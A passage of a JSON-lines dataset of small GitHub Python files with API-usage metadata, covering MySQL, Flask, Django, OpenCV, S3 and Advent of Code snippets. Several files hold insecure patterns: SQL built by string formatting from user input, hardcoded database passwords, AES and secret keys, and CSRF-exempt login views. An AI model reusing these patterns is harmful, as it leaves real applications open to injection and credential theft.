"numpy.log", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}]} +{"seq_id": "32236773075", "text": "import MySQLdb as sql\n\ndb = sql.connect(\"localhost\",\"arpit\",\"Test@12345\",\"library\")\ncursor = db.cursor()\n\nid = int(raw_input(\"ID :\"))\nname = str(raw_input(\"Name :\"))\ndept = str(raw_input(\"Dept :\"))\nsalary = int(raw_input(\"Salary :\"))\n\ncom = \"\"\"INSERT INTO STAFF VALUES('%d','%s','%s','%d')\"\"\"%(id,name,dept,salary)\n\n\n", "repo_name": "arp1561/hotel_management", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "MySQLdb.connect", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "38532653521", "text": "# Print date and time together in the form of : mm/dd/yyyy hh:mm:sss\r\n# / For this use datetime class of datetime module [From import method]\r\n# // Hint use %s%s%s %s:%s:%s\r\n\r\nimport datetime\r\ndatetime_obj = datetime.datetime.now()\r\nprint(datetime_obj)\r\n\r\nfrom datetime import datetime\r\ndatetime_ddmmyyyy = datetime.day, datetime.month, datetime.year\r\ndatetime_hrmm = datetime\r\n\r\n# print(\"%s%s%s %s:%s:%s\" , datetime_ddmmyyyy, datetime_hrmm)\r\nprint(datetime_ddmmyyyy,datetime_hrmm, '%s%s%s %s:%s:%s')", "repo_name": "MohammedA-04/SDD_Python", "sub_path": "Wk9_Tutorial/2B.py", "file_name": "2B.py", "file_ext": "py", "file_size_in_byte": 500, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "attribute"}, {"api_name": "datetime.datetime.day", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.datetime.month", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.datetime.year", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "21923942360", "text": "import sys\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QFileDialog\nfrom ImageWindow import ImageWindow\nfrom LoginWindow import LoginWindow\n\n\nclass MainWindow(QtWidgets.QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n uic.loadUi(\"GUI/startPage.ui\", self)\n self.imageButton.clicked.connect(self.showImageWindow)\n self.sqlButton.clicked.connect(self.showLoginWindow)\n self.show()\n self.setFixedSize(210, 210)\n\n def showImageWindow(self):\n global image_ui\n image_ui = ImageWindow(ex)\n image_ui.show()\n self.close()\n\n def showLoginWindow(self):\n global login_ui\n login_ui = LoginWindow(ex)\n login_ui.show()\n self.close()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n global ex\n ex = MainWindow()\n a = app.exec_()\n sys.exit(a)\n", "repo_name": "Anastasiyabordak/Anadat", "sub_path": "code/MainWindow.py", "file_name": "MainWindow.py", "file_ext": "py", "file_size_in_byte": 961, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 9, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.uic", "line_number": 16, "usage_type": "name"}, {"api_name": "ImageWindow.ImageWindow", "line_number": 24, "usage_type": "call"}, {"api_name": "LoginWindow.LoginWindow", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 36, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 36, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "17676397480", "text": "from flask import Flask, render_template\nfrom flask_socketio import SocketIO\nimport eventlet\neventlet.monkey_patch()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'vnkdjnfjknfl1232#'\nsocketio = SocketIO(app, async_mode='eventlet', message_queue='redis://redis:6379/0') \n#socketio = SocketIO(app) \n\n@app.route('/')\ndef sessions():\n return render_template('session.html')\n\ndef messageReceived(methods=['GET', 'POST']):\n print('message was received!!!')\n\n@socketio.on('my event')\ndef handle_my_custom_event(json, methods=['GET', 'POST']):\n print('received my event: ' + str(json))\n #socketio.emit('my response', json, namespace='/', callback=messageReceived)\n socketio.emit('my response', json)\n\nif __name__ == '__main__':\n socketio.run(app, debug=True)", "repo_name": "suhansaha/algotrader", "sub_path": "src/wsgi_websocket.py", "file_name": "wsgi_websocket.py", "file_ext": "py", "file_size_in_byte": 774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "eventlet.monkey_patch", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_socketio.SocketIO", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "21987173679", "text": "from flask import (\n Blueprint, make_response, send_from_directory\n)\n\nfrom main import app\n\nbp = Blueprint('pwa', __name__, url_prefix='')\n\n\n@bp.route('/manifest.json')\ndef manifest():\n return app.send_from_directory('pwa', 'manifest.json')\n\n\n@bp.route('/sw.js')\ndef service_worker():\n response = app.make_response(app.send_from_directory('pwa', 'sw.js'))\n response.headers['Cache-Control'] = 'no-cache'\n return response", "repo_name": "Yasmine091/python-et-flask", "sub_path": "pwa.py", "file_name": "pwa.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "main.app.send_from_directory", "line_number": 12, "usage_type": "call"}, {"api_name": "main.app", "line_number": 12, "usage_type": "name"}, {"api_name": "main.app.make_response", "line_number": 17, "usage_type": "call"}, {"api_name": "main.app", "line_number": 17, "usage_type": "name"}, {"api_name": "main.app.send_from_directory", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "44638571452", "text": "# AOC 2022 Day 05\n\nimport pathlib\n\nroot_path = pathlib.Path.home() / \"git\" / \"AOC2022\" / \"day05\" / \"day05\"\n\ndef parse_move(line):\n spl = line.split(\" \")\n return int(spl[1]), int(spl[3])-1, int(spl[5])-1\n\ndef part1(lines, stacks, move):\n while move < len(lines):\n (count, fr, to) = parse_move(lines[move])\n for i in range(count):\n stacks[to].append(stacks[fr].pop())\n move += 1\n\n retval = \"\"\n for i in range(len(stacks)):\n retval += stacks[i].pop()\n\n return retval\n\n\ndef part2(lines, stacks, move):\n while move < len(lines):\n (count, fr, to) = parse_move(lines[move])\n temp = []\n for i in range(count):\n temp.append(stacks[fr].pop())\n for i in range(count):\n stacks[to].append(temp.pop())\n move += 1\n\n retval = \"\"\n for i in range(len(stacks)):\n retval += stacks[i].pop()\n\n return retval\n\ndef parse(lines, bottom):\n stacks = [[] for x in range(bottom)]\n for line in range(bottom-1, -1, -1):\n crate = 0\n while crate*4+1 < len(lines[line]):\n if lines[line][crate*4+1].isupper():\n stacks[crate].append(lines[line][crate*4+1])\n crate += 1\n return stacks\n\n\nif __name__ == \"__main__\":\n\n ###\n ### Sample Input\n # with open(root_path / \"sample\", \"r\") as f:\n # lines = [line for line in f.readlines()]\n\n # stacks = parse(lines, 3) # For the sample input\n # print(f\"Part 1: Answer: {part1(lines, stacks, 5)}\")\n\n # stacks = parse(lines, 3) # For the sample input\n # print(f\"Part 2: Answer: {part2(lines, stacks, 5)}\")\n\n\n ###\n ### Real Input\n with open(root_path / \"input\", \"r\") as f:\n lines = [line for line in f.readlines()]\n\n stacks = parse(lines, 9) # For the real input\n print(f\"Part 1: Answer: {part1(lines, stacks, 10)}\")\n\n stacks = parse(lines, 9) # For the real input\n print(f\"Part 2: Answer: {part2(lines, stacks, 10)}\")\n", "repo_name": "JFincher42/AOC2022", "sub_path": "day05/day05/day05.py", "file_name": "day05.py", "file_ext": "py", "file_size_in_byte": 1970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path.home", "line_number": 5, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "8460696805", "text": "\"\"\"\nauthor: Ashikul Hosen\nemail: sagor.ashikul@gmail.com\ngithub: https://github.com/ash1247/\nDate: 11.10.2019 (DD.MM.YYYY)\n\n\"\"\"\n\n# Implements the point clipping algorithm\n\nimport cv2 \nimport numpy as np\n\nheight = 640\nwidth = 840\nx_min, y_min = 200, height-200 # Initial axes value of the diagonal of the rectangle\nx_max, y_max = 600, height-400 # final axes value of the diagonal of the rectangle\npoints = [(100, height-100), (250, height-250), (300, height-300), (350, height-350), (500, height-500),\n (150, height-150), (220, height-250), (500, height-450), (200, height-500)]\n\n\nimage = np.zeros((height, width, 3), np.uint8)\n\nfor i in points:\n cv2.circle(image, i, 5, (0, 0, 255), -1)\n\ncv2.rectangle(image, (x_min, y_min), (x_max, y_max), (127, 127, 0), 2)\ncv2.imshow(\"Before point cliping\", image)\ncv2.waitKey(0)\n\nfor i in points:\n print(i)\n # The if condition for i[1] changed because of the vertical axis shift\n if (((i[0] < x_min) or (i[0] > x_max)) or ((i[1] > y_min) or (i[1] < y_max))):\n cv2.circle(image, i, 5, (0, 0, 0), -1)\n\ncv2.imshow(\"After point clipping\", image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()", "repo_name": "ash1247/CG-Lab", "sub_path": "Lab-4/03. Point clipping algorithm.py", "file_name": "03. Point clipping algorithm.py", "file_ext": "py", "file_size_in_byte": 1148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "34095027591", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\" \n This script analyzes a bunch of wav files to learn about the interaural \n time differences for a given (binaural) system.\n\n The result can be used with the class Localizer from the accompanying\n script crosscorrelizer.py to localize sound sources.\n\"\"\"\n\nimport re\nimport os.path\nfrom collections import defaultdict,Counter\nfrom scipy.io import wavfile\nimport numpy as np\nimport yaml\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-c', dest='config', required=True)\nparser.add_argument('-o', dest='outfile', required=True)\nparser.add_argument('-i', dest='infiles', nargs='+', required=True)\nargs = parser.parse_args()\n\nfrom crosscorrelizer import cross_correlizer\n\nwith open(args.config) as configfile:\n config = yaml.load(configfile)\nfilename_pattern = config['filename_pattern']\nsample_rate = config['sample_rate']\nsample_length = config['sample_length']\nmax_itd = config['max_itd']\nmax_frequency = config['max_frequency']\n\nccr = cross_correlizer(sample_rate, max_itd, max_frequency)\n\nhistograms = defaultdict(Counter)\n\nhist_len = None\n\nfor infile_name in args.infiles:\n logger.info(\"Handling file: %s\", infile_name)\n angle = int(re.match(filename_pattern, os.path.basename(infile_name)).group('angle'))\n logger.info(\"Angle is: %d\", angle)\n\n sr,infile = wavfile.read(infile_name)\n assert sr == sample_rate\n\n num_samples = int(len(infile) / sample_length / sample_rate)\n logger.info(\"Number of samples: %d\", num_samples)\n ccr_maxs = Counter()\n for offset in range(num_samples):\n start = offset * sample_length * sample_rate\n end = start + sample_length * sample_rate\n sample = infile[start:end]\n hist = ccr.cross_correlize(sample)\n ccr_maxs.update((hist.argmax(),))\n\n if hist_len is None:\n hist_len = len(hist)\n else:\n assert hist_len == len(hist)\n\n histograms[angle].update(ccr_maxs)\n\nangles = np.array(sorted(histograms))\nmax_match = hist_len\nhists = np.zeros((len(angles),max_match), dtype=float)\n\nfor i,a in enumerate(sorted(histograms)):\n h = histograms[a]\n for m in range(max_match):\n hists[i,m] = h[m]\n\nhists = hists.T\n\nhists /= hists.sum(axis=0)\n\nnp.savez(args.outfile, angles=angles, hists=hists.T, cross_correlizer = ccr)\n", "repo_name": "tatome/crosscorrelizer", "sub_path": "learn.py", "file_name": "learn.py", "file_ext": "py", "file_size_in_byte": 2427, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 24, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 33, "usage_type": "call"}, {"api_name": "crosscorrelizer.cross_correlizer", "line_number": 40, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 42, "usage_type": "argument"}, {"api_name": "re.match", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.path.basename", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 48, "usage_type": "name"}, {"api_name": "scipy.io.wavfile.read", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 51, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.savez", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "22386372189", "text": "from django.shortcuts import render\nimport json\nimport rsa\nimport base64\nimport random ,string,os\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter\nfrom .settings import STATUS_CODE\nfrom .models import user,inactivatedUser\nfrom SafeLogin import settings\nfrom Crypto.Cipher import AES\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nf=open('private.pem','r')\nAESkey=b\"fj*&29Jji8@@pP0$\"\nactiveUserRandomRange=\"abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPRSTUVWXYZ0123456789\"\nMYURL=\"127.0.0.1:8000/bapi/\"\nprivkey = rsa.PrivateKey.load_pkcs1(f.read().encode())\nfrom .tools.emailSender import sendEmailForUserRegister\n\n'''\n预留手机登录接口\n'''\ndef cellphoneLogin(request):\n pass\n\n'''\n用于用户注册��加密)\n提交信息格式{}\nTODO:\n验证邮箱格式以及用户名格式\n'''\n@csrf_exempt\ndef register(request):\n #解密数据\n try:\n jMsg=_getRawData(request)\n except Exception as e:\n if settings.DEBUG ==True:\n print(e)\n resp = {'statuscode': STATUS_CODE[\"DATA_FORMAT_WRONG\"], 'detail': 'data format fail'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n #验证用户是否存在\n if user.objects.filter(email=jMsg[\"email\"]) or inactivatedUser.objects.filter(email=jMsg[\"email\"]):\n resp = {'statuscode': STATUS_CODE[\"USER_EXIST\"], 'detail': 'email had registered'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n #发送验证邮件\n rand_str = ''.join(random.sample(activeUserRandomRange+ string.digits, 20)) # The random string\n try:\n sendEmailForUserRegister(jMsg[\"email\"],MYURL+\"register/active/?email=\"+jMsg[\"email\"]+\"&key=\"+rand_str)\n except Exception as e:\n if settings.DEBUG == True:\n print(e)\n resp = {'statuscode': STATUS_CODE[\"EMAIL_SEND_FAIL\"], 'detail': 'can\\'t send email'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n #添加用户信息(未激活)\n newUser=inactivatedUser(username=jMsg[\"username\"], passwordMd5=jMsg[\"password\"],email=jMsg[\"email\"],randomKey=rand_str)\n newUser.save()\n\n #返回成功信息\n resp = {'statuscode': STATUS_CODE[\"SUCCEED\"], 'detail': 'Register success'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n'''\n激活用户账户的操作\n用于用户邮箱收到的链接\n'''\ndef registerActive(request):\n print(request.GET)\n if request.GET:\n activeuser=inactivatedUser.objects.filter(email=request.GET[\"email\"],randomKey=request.GET[\"key\"])\n if activeuser:\n activeuser=activeuser[0]\n newUser = user(username=activeuser.username, passwordMd5=activeuser.passwordMd5, email=activeuser.email, flag=0)\n activeuser.delete()\n newUser.save()\n #这里应该返回一个网页\n resp = {'statuscode': STATUS_CODE[\"SUCCEED\"], 'detail': '激活成功'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n resp = {'statuscode': STATUS_CODE[\"UNKNOW_ERROR\"], 'detail': '激活链接错误'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n pass\n'''\n登录\n'''\n@csrf_exempt\ndef login(request):\n #解密数据\n try:\n jMsg=_getRawData(request)\n except Exception as e:\n if settings.DEBUG ==True:\n print(e)\n resp = {'statuscode': STATUS_CODE[\"DATA_FORMAT_WRONG\"], 'detail': 'data format fail'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n #连续登录检测\n\n #查找用户\n\n #把用户信息和session关联起来\n\n if 'test' in request.session:\n print(request.session['test'])\n request.session[\"test\"]=\"test\"\n\n resp = {'statuscode':STATUS_CODE[\"SUCCEED\"], 'detail': 'Get success'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n# '''产生验证码的'''\n# def captcha(request):\n# '''Captcha'''\n# image = Image.new('RGB', (147, 49), color = (255, 255, 255)) # model, size, background color\n# font_file = os.path.join(BASE_DIR, 'Blog/static/Blog/ttf/Arial.ttf') # choose a font file\n# font = ImageFont.truetype(font_file, 47) # the font object\n# draw = ImageDraw.Draw(image)\n# rand_str = ''.join(random.sample(myRandomRange + string.digits, 4)) # The random string\n# request.session[\"captcha\"]=rand_str\n# chance = min(100, max(0, 20)) # 大小限制在[0, 100]\n#\n# for w in range(147):\n# for h in range(49):\n# tmp = random.randint(0, 100)\n# if tmp > 100 - chance:\n# draw.point((w, h), fill=(0, 0, 0))\n# draw.text((7, 0), rand_str, fill=(0, 0, 0), font=font) # position, content, color, font\n# line_num = random.randint(*(20, 50)) # 干扰线条数\n#\n# for i in range(line_num):\n# # 起始点\n# begin = (random.randint(0, 147), random.randint(0, 49))\n# # 结束点\n# end = (random.randint(0, 147), random.randint(0,49))\n# draw.line([begin, end], fill=(0, 0, 0))\n#\n# del draw\n# request.session['captcha'] = rand_str.lower() # store the content in Django's session store\n# buf = BytesIO()# a memory buffer used to store the generated image\n#\n# image.save(buf, 'jpeg')\n# return HttpResponse(buf.getvalue(), 'image/jpeg') # return th\n\n'''\n获得未加密的数据\ninput:request\nreturn:字典格式\n'''\ndef _getRawData(request):\n print(request.body.decode())\n data=json.loads(request.body.decode())\n params = data[\"params\"]\n encSecKey = data[\"encSecKey\"]\n params = base64.b64decode(params)\n secKey = rsa.decrypt(base64.b64decode(encSecKey), privkey)\n cipher1 = AES.new(secKey, AES.MODE_ECB)\n t_params = cipher1.decrypt(params)\n for i in range(len(t_params) - 1, 0, -1):\n if t_params[i] is not t_params[len(t_params) - 1]:\n t_params = t_params[:i + 1]\n break\n cipher = AES.new(AESkey, AES.MODE_ECB)\n msg = cipher.decrypt(t_params)\n for i in range(len(msg) - 1, 0, -1):\n if msg[i] is not msg[len(t_params) - 1]:\n msg = msg[:i + 1]\n break\n return json.loads(msg.decode())", "repo_name": "marykt/SSLogin_Django", "sub_path": "boynextdoor/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rsa.PrivateKey.load_pkcs1", "line_number": 18, "usage_type": "call"}, {"api_name": "rsa.PrivateKey", "line_number": 18, "usage_type": "attribute"}, {"api_name": "SafeLogin.settings.DEBUG", "line_number": 39, "usage_type": "attribute"}, {"api_name": "SafeLogin.settings", "line_number": 39, "usage_type": "name"}, {"api_name": "settings.STATUS_CODE", "line_number": 41, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "models.user.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.user.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.user", "line_number": 45, "usage_type": "name"}, {"api_name": "models.inactivatedUser.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.inactivatedUser.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.inactivatedUser", "line_number": 45, "usage_type": "name"}, {"api_name": "settings.STATUS_CODE", "line_number": 46, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 50, "usage_type": "call"}, {"api_name": "string.digits", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tools.emailSender.sendEmailForUserRegister", "line_number": 52, "usage_type": "call"}, {"api_name": "SafeLogin.settings.DEBUG", "line_number": 54, "usage_type": "attribute"}, {"api_name": "SafeLogin.settings", "line_number": 54, "usage_type": "name"}, {"api_name": "settings.STATUS_CODE", "line_number": 56, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 57, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "models.inactivatedUser", "line_number": 60, "usage_type": "call"}, {"api_name": "settings.STATUS_CODE", "line_number": 64, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 65, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 33, "usage_type": "name"}, {"api_name": "models.inactivatedUser.objects.filter", "line_number": 73, "usage_type": "call"}, {"api_name": "models.inactivatedUser.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "models.inactivatedUser", "line_number": 73, "usage_type": "name"}, {"api_name": "models.user", "line_number": 76, "usage_type": "call"}, {"api_name": "settings.STATUS_CODE", "line_number": 80, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 81, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 81, "usage_type": "call"}, {"api_name": "settings.STATUS_CODE", "line_number": 82, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 83, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 83, "usage_type": "call"}, {"api_name": "SafeLogin.settings.DEBUG", "line_number": 95, "usage_type": "attribute"}, {"api_name": "SafeLogin.settings", "line_number": 95, "usage_type": "name"}, {"api_name": "settings.STATUS_CODE", "line_number": 97, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 98, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 98, "usage_type": "call"}, {"api_name": "settings.STATUS_CODE", "line_number": 110, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 111, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 111, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 89, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 153, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 156, "usage_type": "call"}, {"api_name": "rsa.decrypt", "line_number": 157, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 157, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 158, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 158, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 158, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 164, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 164, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 164, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 170, "usage_type": "call"}]} +{"seq_id": "21149437556", "text": "import json\nimport boto3\nimport os\n\n#Setting default values\nregion=\"us-east-1\"\n\ndef lambda_handler(event, context):\n\n try:\n print(\"Event received from Lambda's trigger \" + str(event))\n \n #Parameters from Lambda test event or API Gateway trigger\n if 'objectname' in event: object_name = event.get('objectname')\n else: object_name = json.loads(event['body']).get('objectname')\n if 's3' in event: s3_bucket = event.get('s3')\n else: s3_bucket = json.loads(event['body']).get('s3')\n\n \n s3 = boto3.client(\"s3\")\n \n response = s3.get_object(Bucket=s3_bucket, Key=object_name)\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(response[\"Body\"].read().decode())\n }\n except Exception as error:\n return {\n \"statusCode\": 500,\n \"body\": json.dumps({\"message\": str(error)})\n }", "repo_name": "lautmat/trainingdemo-secaws", "sub_path": "video 2.3/getPrivkey.py", "file_name": "getPrivkey.py", "file_ext": "py", "file_size_in_byte": 915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 20, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "11734564164", "text": "### IMPORTS \n\nfrom phasellm.llms import OpenAIGPTWrapper, ClaudeWrapper, ChatPrompt\nfrom phasellm.agents import NewsSummaryAgent\nimport json \n\n### ENVIRONMENT VARIABLES\n\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\nopenai_api_key = os.getenv(\"OPENAI_API_KEY\")\nanthropic_api_key = os.getenv(\"ANTHROPIC_API_KEY\")\nnews_api_api_key = os.getenv(\"NEWS_API_API_KEY\")\n\n### SETUP THE EXPERIMENTAL DATA\n\nqueries = ['spacex', 'federal reserve', 'shopify', 'openai', 'biden', 'trump', 'met gala', 'king charles', 'poland', 'euro']\nJSON_FILE = \"news_articles.json\"\n\nllm_1 = OpenAIGPTWrapper(openai_api_key, model=\"gpt-4\")\nllm_2 = 